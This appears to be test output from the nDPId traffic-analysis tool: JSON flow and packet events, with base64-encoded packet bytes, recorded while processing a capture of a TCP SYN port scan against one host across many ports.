-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1708,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1698,"flow_packet_id":1,"flow_last_seen":1278275061002,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061002,"pkt":"ACYLMQczACWzv5HuCABFAAAs3MMAACkGQq+sEAAIQA2GNIzSHOrdUoMYAAAAAGACCAATpQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1709,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1699,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061002,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4321,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1709,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1699,"flow_packet_id":1,"flow_last_seen":1278275061002,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061002,"pkt":"ACYLMQczACWzv5HuCABFAAAslgAAAC4GhHKsEAAIQA2GNIzSEOHdUoMYAAAAAGACDAAbrgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1710,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1700,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061003,"flow_last_seen":1278275061003,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061003,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5859,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1710,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1700,"flow_packet_id":1,"flow_last_seen":1278275061003,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061003,"pkt":"ACYLMQczACWzv5HuCABFAAAsAEUAADYGEi6sEAAIQA2GNIzTFuPdU4MZAAAAAGACDAAVqQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1711,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1701,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061003,"flow_last_seen":1278275061003,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061003,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":33,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1711,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1701,"flow_packet_id":1,"flow_last_seen":1278275061003,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061003,"pkt":"ACYLMQczACWzv5HuCABFAAAsKngAACUG+PqsEAAIQA2GNIzTACHdU4MZAAAAAGACCAAwawAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1712,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1702,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061004,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":668,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1712,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1702,"flow_packet_id":1,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061004,"pkt":"ACYLMQczACWzv5HuCABFAAAswesAADIGVIesEAAIQA2GNIzTApzdU4MZAAAAAGACDAAp8AAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1713,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1703,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061004,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":18988,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1713,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1703,"flow_packet_id":1,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061004,"pkt":"ACYLMQczACWzv5HuCABFAAAsb6EAADgGoNGsEAAIQA2GNIzTSizdU4MZAAAAAGACBADqXwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1714,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1704,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061004,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1213,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1714,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1704,"flow_packet_id":1,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061004,"pkt":"ACYLMQczACWzv5HuCABFAAAsT8MAACoGzq+sEAAIQA2GNIzTBL3dU4MZAAAAAGACDAAnzwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1715,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1705,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061004,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2105,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1715,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1705,"flow_packet_id":1,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061004,"pkt":"ACYLMQczACWzv5HuCABFAAAsp3EAADEGcAGsEAAIQA2GNIzTCDndU4MZAAAAAGACCAAoUwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1716,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1706,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061004,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1716,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1706,"flow_packet_id":1,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061004,"pkt":"ACYLMQczACWzv5HuCABFAAAsVcwAACoGyKasEAAIQA2GNIzTIyjdU4MZAAAAAGACDAAJZAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1717,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1707,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061004,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":161,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1717,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1707,"flow_packet_id":1,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061004,"pkt":"ACYLMQczACWzv5HuCABFAAAsoF8AADMGdROsEAAIQA2GNIzTAKHdU4MZAAAAAGACEAAn6wAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1718,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1708,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061004,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9535,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1718,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1708,"flow_packet_id":1,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061004,"pkt":"ACYLMQczACWzv5HuCABFAAAsIgcAADcG72usEAAIQA2GNIzTJT\/dU4MZAAAAAGACEAADTQAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1719,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1709,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061004,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1719,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1709,"flow_packet_id":1,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061004,"pkt":"ACYLMQczACWzv5HuCABFAAAsK00AACcG9iWsEAAIQA2GNIzTw1PdU4MZAAAAAGACEABlOAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1720,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1710,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061004,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1720,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1710,"flow_packet_id":1,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061004,"pkt":"ACYLMQczACWzv5HuCABFAAAscdYAADoGnJysEAAIQA2GNIzTB9DdU4MZAAAAAGACDAAkvAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1721,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1711,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061004,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3324,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1721,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1711,"flow_packet_id":1,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061004,"pkt":"ACYLMQczACWzv5HuCABFAAAskloAADsGexisEAAIQA2GNIzTDPzdU4MZAAAAAGACEAAbkAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1722,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1712,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061004,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1090,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1722,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1712,"flow_packet_id":1,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061004,"pkt":"ACYLMQczACWzv5HuCABFAAAsQgQAACwG2m6sEAAIQA2GNIzTBELdU4MZAAAAAGACBAAwSgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1723,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1713,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061004,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8254,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1723,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1713,"flow_packet_id":1,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061004,"pkt":"ACYLMQczACWzv5HuCABFAAAslhYAADkGeVysEAAIQA2GNIzTID7dU4MZAAAAAGACCAAQTgAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1724,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1714,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061004,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49159,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1724,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1714,"flow_packet_id":1,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061004,"pkt":"ACYLMQczACWzv5HuCABFAAAsJNMAACgG+5+sEAAIQA2GNIzTwAfdU4MZAAAAAGACBAB0hAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1725,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1715,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061004,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1755,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1725,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1715,"flow_packet_id":1,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061004,"pkt":"ACYLMQczACWzv5HuCABFAAAsuDsAACYGajesEAAIQA2GNIzTBtvdU4MZAAAAAGACDAAlsQAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1726,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1716,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061004,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":880,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1726,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1716,"flow_packet_id":1,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061004,"pkt":"ACYLMQczACWzv5HuCABFAAAsO7gAADEG27qsEAAIQA2GNIzTA3DdU4MZAAAAAGACCAAtHAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1727,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1717,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061004,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":555,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1727,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1717,"flow_packet_id":1,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061004,"pkt":"ACYLMQczACWzv5HuCABFAAAsa3wAACkGs\/asEAAIQA2GNIzTAivdU4MZAAAAAGACCAAuYQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1728,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1718,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5904,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1728,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1718,"flow_packet_id":1,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061006,"pkt":"ACYLMQczACWzv5HuCABFAAAsf5AAAC0Gm+KsEAAIQA2GNIzTFxDdU4MZAAAAAGACCAAZfAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1729,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1719,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3920,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1729,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1719,"flow_packet_id":1,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061006,"pkt":"ACYLMQczACWzv5HuCABFAAAszRsAACoGUVesEAAIQA2GNIzTD1DdU4MZAAAAAGACDAAdPAAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1730,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1720,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":13722,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1730,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1720,"flow_packet_id":1,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061006,"pkt":"ACYLMQczACWzv5HuCABFAAAsbKUAADIGqc2sEAAIQA2GNIzTNZrdU4MZAAAAAGACDAD28QAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1731,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1721,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1074,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1731,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1721,"flow_packet_id":1,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061006,"pkt":"ACYLMQczACWzv5HuCABFAAAsvVQAAC4GXR6sEAAIQA2GNIzTBDLdU4MZAAAAAGACDAAoWgAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1732,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1722,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":777,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1732,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1722,"flow_packet_id":1,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061006,"pkt":"ACYLMQczACWzv5HuCABFAAAstv8AADQGXXOsEAAIQA2GNIzTAwndU4MZAAAAAGACBAAxgwAAAgQFtA=="} 